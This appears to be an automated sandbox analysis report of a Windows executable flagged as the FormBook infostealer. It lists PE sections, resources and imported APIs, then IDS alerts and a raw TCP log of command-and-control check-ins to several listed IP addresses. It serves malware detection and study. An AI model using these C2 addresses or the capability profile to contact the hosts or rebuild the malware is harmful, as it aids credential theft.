                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                  Sections

                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .rsrc0xc40000x603580x60400c936909db4f992a147b477f614da3d13False0.931929788961039data7.903039445408422IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .reloc0x1250000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                  Resources

                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                  RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                  RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                  RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                  RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                  RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                  RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                  RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                  RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                  RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                  RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                  RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                                                                                  RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                  RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                                                                                  RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                  RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                  RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                  RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                  RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                  RT_RCDATA0xcc7b80x5765fdata1.0003240377336353
                                                                                  RT_GROUP_ICON0x123e180x76dataEnglishGreat Britain0.6610169491525424
                                                                                  RT_GROUP_ICON0x123e900x14dataEnglishGreat Britain1.25
                                                                                  RT_GROUP_ICON0x123ea40x14dataEnglishGreat Britain1.15
                                                                                  RT_GROUP_ICON0x123eb80x14dataEnglishGreat Britain1.25
                                                                                  RT_VERSION0x123ecc0xdcdataEnglishGreat Britain0.6181818181818182
                                                                                  RT_MANIFEST0x123fa80x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                                                                                  Imports

                                                                                  DLLImport
                                                                                  WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                                                  VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                  COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                                                  MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                  WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                                                  PSAPI.DLLGetProcessMemoryInfo
                                                                                  IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                  USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                                                  UxTheme.dllIsThemeActive
                                                                                  KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                                                  USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                                                  GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                                                  COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                  ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                                                  SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                                  OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

                                                                                  Possible Origin

                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                  EnglishGreat Britain

                                                                                  Network Behavior

                                                                                  Suricata IDS Alerts

                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                  2024-11-20T08:31:49.721951+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649872188.114.96.380TCP
                                                                                  2024-11-20T08:32:05.410049+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64996676.223.74.7480TCP
                                                                                  2024-11-20T08:32:05.410049+01002856318ETPRO MALWARE FormBook CnC Checkin (POST) M41192.168.2.64996676.223.74.7480TCP
                                                                                  2024-11-20T08:32:07.970724+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64998676.223.74.7480TCP
                                                                                  2024-11-20T08:32:10.547590+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64998776.223.74.7480TCP
                                                                                  2024-11-20T08:32:13.073358+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.64998976.223.74.7480TCP
                                                                                  2024-11-20T08:32:19.344001+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649990163.44.185.18380TCP
                                                                                  2024-11-20T08:32:21.920061+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649991163.44.185.18380TCP
                                                                                  2024-11-20T08:32:24.442541+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649992163.44.185.18380TCP
                                                                                  2024-11-20T08:32:26.991329+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649994163.44.185.18380TCP
                                                                                  2024-11-20T08:32:32.755875+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649995172.67.162.1280TCP
                                                                                  2024-11-20T08:32:35.294691+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649996172.67.162.1280TCP
                                                                                  2024-11-20T08:32:37.887957+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649997172.67.162.1280TCP
                                                                                  2024-11-20T08:32:40.445647+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649998172.67.162.1280TCP
                                                                                  2024-11-20T08:32:47.094329+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64999985.159.66.9380TCP
                                                                                  2024-11-20T08:32:49.639800+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65000085.159.66.9380TCP
                                                                                  2024-11-20T08:32:52.186643+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65000285.159.66.9380TCP
                                                                                  2024-11-20T08:32:53.922706+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65000385.159.66.9380TCP
                                                                                  2024-11-20T08:32:59.965616+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650004103.21.221.480TCP
                                                                                  2024-11-20T08:33:02.486694+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650005103.21.221.480TCP
                                                                                  2024-11-20T08:33:05.036604+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650006103.21.221.480TCP
                                                                                  2024-11-20T08:33:07.603228+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650007103.21.221.480TCP
                                                                                  2024-11-20T08:33:13.289060+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650008188.114.96.380TCP
                                                                                  2024-11-20T08:33:15.886844+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650009188.114.96.380TCP
                                                                                  2024-11-20T08:33:18.423233+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650010188.114.96.380TCP
                                                                                  2024-11-20T08:33:20.999361+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650011188.114.96.380TCP
                                                                                  2024-11-20T08:33:26.642780+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65001466.29.137.1080TCP
                                                                                  2024-11-20T08:33:29.217437+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65001566.29.137.1080TCP
                                                                                  2024-11-20T08:33:31.752384+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65001666.29.137.1080TCP
                                                                                  2024-11-20T08:33:34.314684+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65001766.29.137.1080TCP
                                                                                  2024-11-20T08:33:39.962605+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650018203.161.46.20580TCP
                                                                                  2024-11-20T08:33:42.566078+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650019203.161.46.20580TCP
                                                                                  2024-11-20T08:33:45.062014+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650020203.161.46.20580TCP
                                                                                  2024-11-20T08:33:47.638147+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650021203.161.46.20580TCP
                                                                                  2024-11-20T08:33:54.735361+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65002243.155.76.12480TCP
                                                                                  2024-11-20T08:33:57.273456+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65002343.155.76.12480TCP
                                                                                  2024-11-20T08:33:59.818741+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65002543.155.76.12480TCP
                                                                                  2024-11-20T08:34:02.362521+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65002643.155.76.12480TCP
                                                                                  2024-11-20T08:34:08.318850+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650027103.224.182.24280TCP
                                                                                  2024-11-20T08:34:10.867578+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650028103.224.182.24280TCP
                                                                                  2024-11-20T08:34:13.497498+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650029103.224.182.24280TCP
                                                                                  2024-11-20T08:34:16.117357+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650030103.224.182.24280TCP
                                                                                  2024-11-20T08:34:21.628824+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65003113.248.169.4880TCP
                                                                                  2024-11-20T08:34:24.170562+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65003213.248.169.4880TCP
                                                                                  2024-11-20T08:34:26.724768+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65003313.248.169.4880TCP
                                                                                  2024-11-20T08:34:29.348125+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65003413.248.169.4880TCP
                                                                                  2024-11-20T08:34:34.903506+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65003513.248.169.4880TCP
                                                                                  2024-11-20T08:34:37.436227+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65003613.248.169.4880TCP
                                                                                  2024-11-20T08:34:39.991492+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65003713.248.169.4880TCP
                                                                                  2024-11-20T08:34:42.532171+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65003813.248.169.4880TCP
                                                                                  2024-11-20T08:34:48.132791+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650039172.67.162.3980TCP
                                                                                  2024-11-20T08:34:50.723072+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650040172.67.162.3980TCP
                                                                                  2024-11-20T08:34:53.275913+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650041172.67.162.3980TCP
                                                                                  2024-11-20T08:34:55.824858+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650043172.67.162.3980TCP
                                                                                  2024-11-20T08:35:01.374225+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65004413.248.169.4880TCP
                                                                                  2024-11-20T08:35:03.940299+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65004513.248.169.4880TCP
                                                                                  2024-11-20T08:35:06.479706+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65004613.248.169.4880TCP
                                                                                  2024-11-20T08:35:09.015592+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65004713.248.169.4880TCP
                                                                                  2024-11-20T08:35:14.777692+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650048104.21.4.9380TCP
                                                                                  2024-11-20T08:35:17.312999+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650049104.21.4.9380TCP
                                                                                  2024-11-20T08:35:19.858913+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650050104.21.4.9380TCP
                                                                                  2024-11-20T08:35:22.429916+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650051104.21.4.9380TCP

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Nov 20, 2024 08:31:49.069591045 CET4987280192.168.2.6188.114.96.3
                                                                                  Nov 20, 2024 08:31:49.075570107 CET8049872188.114.96.3192.168.2.6
                                                                                  Nov 20, 2024 08:31:49.075679064 CET4987280192.168.2.6188.114.96.3
                                                                                  Nov 20, 2024 08:31:49.084477901 CET4987280192.168.2.6188.114.96.3
                                                                                  Nov 20, 2024 08:31:49.090507030 CET8049872188.114.96.3192.168.2.6
                                                                                  Nov 20, 2024 08:31:49.721586943 CET8049872188.114.96.3192.168.2.6
                                                                                  Nov 20, 2024 08:31:49.721900940 CET8049872188.114.96.3192.168.2.6
                                                                                  Nov 20, 2024 08:31:49.721951008 CET4987280192.168.2.6188.114.96.3
                                                                                  Nov 20, 2024 08:31:49.726294994 CET4987280192.168.2.6188.114.96.3
                                                                                  Nov 20, 2024 08:31:49.731173038 CET8049872188.114.96.3192.168.2.6
                                                                                  Nov 20, 2024 08:32:04.888576031 CET4996680192.168.2.676.223.74.74
                                                                                  Nov 20, 2024 08:32:04.893407106 CET804996676.223.74.74192.168.2.6
                                                                                  Nov 20, 2024 08:32:04.893480062 CET4996680192.168.2.676.223.74.74
                                                                                  Nov 20, 2024 08:32:04.926918983 CET4996680192.168.2.676.223.74.74
                                                                                  Nov 20, 2024 08:32:04.931786060 CET804996676.223.74.74192.168.2.6
                                                                                  Nov 20, 2024 08:32:05.409843922 CET804996676.223.74.74192.168.2.6
                                                                                  Nov 20, 2024 08:32:05.409986973 CET804996676.223.74.74192.168.2.6
                                                                                  Nov 20, 2024 08:32:05.410048962 CET4996680192.168.2.676.223.74.74
                                                                                  Nov 20, 2024 08:32:06.436826944 CET4996680192.168.2.676.223.74.74
                                                                                  Nov 20, 2024 08:32:07.455744982 CET4998680192.168.2.676.223.74.74
                                                                                  Nov 20, 2024 08:32:07.460661888 CET804998676.223.74.74192.168.2.6
                                                                                  Nov 20, 2024 08:32:07.460738897 CET4998680192.168.2.676.223.74.74
                                                                                  Nov 20, 2024 08:32:07.473522902 CET4998680192.168.2.676.223.74.74
                                                                                  Nov 20, 2024 08:32:07.478590012 CET804998676.223.74.74192.168.2.6
                                                                                  Nov 20, 2024 08:32:07.970556974 CET804998676.223.74.74192.168.2.6
                                                                                  Nov 20, 2024 08:32:07.970664978 CET804998676.223.74.74192.168.2.6
                                                                                  Nov 20, 2024 08:32:07.970724106 CET4998680192.168.2.676.223.74.74
                                                                                  Nov 20, 2024 08:32:08.983541965 CET4998680192.168.2.676.223.74.74
                                                                                  Nov 20, 2024 08:32:10.002407074 CET4998780192.168.2.676.223.74.74
                                                                                  Nov 20, 2024 08:32:10.007886887 CET804998776.223.74.74192.168.2.6
                                                                                  Nov 20, 2024 08:32:10.007997036 CET4998780192.168.2.676.223.74.74
                                                                                  Nov 20, 2024 08:32:10.020680904 CET4998780192.168.2.676.223.74.74
                                                                                  Nov 20, 2024 08:32:10.025598049 CET804998776.223.74.74192.168.2.6
                                                                                  Nov 20, 2024 08:32:10.025657892 CET804998776.223.74.74192.168.2.6
                                                                                  Nov 20, 2024 08:32:10.547473907 CET804998776.223.74.74192.168.2.6
                                                                                  Nov 20, 2024 08:32:10.547517061 CET804998776.223.74.74192.168.2.6
                                                                                  Nov 20, 2024 08:32:10.547590017 CET4998780192.168.2.676.223.74.74
                                                                                  Nov 20, 2024 08:32:11.530396938 CET4998780192.168.2.676.223.74.74
                                                                                  Nov 20, 2024 08:32:12.553869963 CET4998980192.168.2.676.223.74.74
                                                                                  Nov 20, 2024 08:32:12.558830023 CET804998976.223.74.74192.168.2.6
                                                                                  Nov 20, 2024 08:32:12.558895111 CET4998980192.168.2.676.223.74.74
                                                                                  Nov 20, 2024 08:32:12.567233086 CET4998980192.168.2.676.223.74.74
                                                                                  Nov 20, 2024 08:32:12.572084904 CET804998976.223.74.74192.168.2.6
                                                                                  Nov 20, 2024 08:32:13.073115110 CET804998976.223.74.74192.168.2.6
                                                                                  Nov 20, 2024 08:32:13.073292017 CET804998976.223.74.74192.168.2.6
                                                                                  Nov 20, 2024 08:32:13.073358059 CET4998980192.168.2.676.223.74.74
                                                                                  Nov 20, 2024 08:32:13.075545073 CET4998980192.168.2.676.223.74.74
                                                                                  Nov 20, 2024 08:32:13.080660105 CET804998976.223.74.74192.168.2.6
                                                                                  Nov 20, 2024 08:32:18.551095963 CET4999080192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:18.555916071 CET8049990163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:18.556005955 CET4999080192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:18.568269968 CET4999080192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:18.573358059 CET8049990163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:19.343815088 CET8049990163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:19.343837976 CET8049990163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:19.343848944 CET8049990163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:19.343940973 CET8049990163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:19.343952894 CET8049990163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:19.344001055 CET4999080192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:19.344048023 CET4999080192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:19.344062090 CET8049990163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:19.344116926 CET4999080192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:19.344161987 CET8049990163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:19.344175100 CET8049990163.44.185.183192.168.2.6
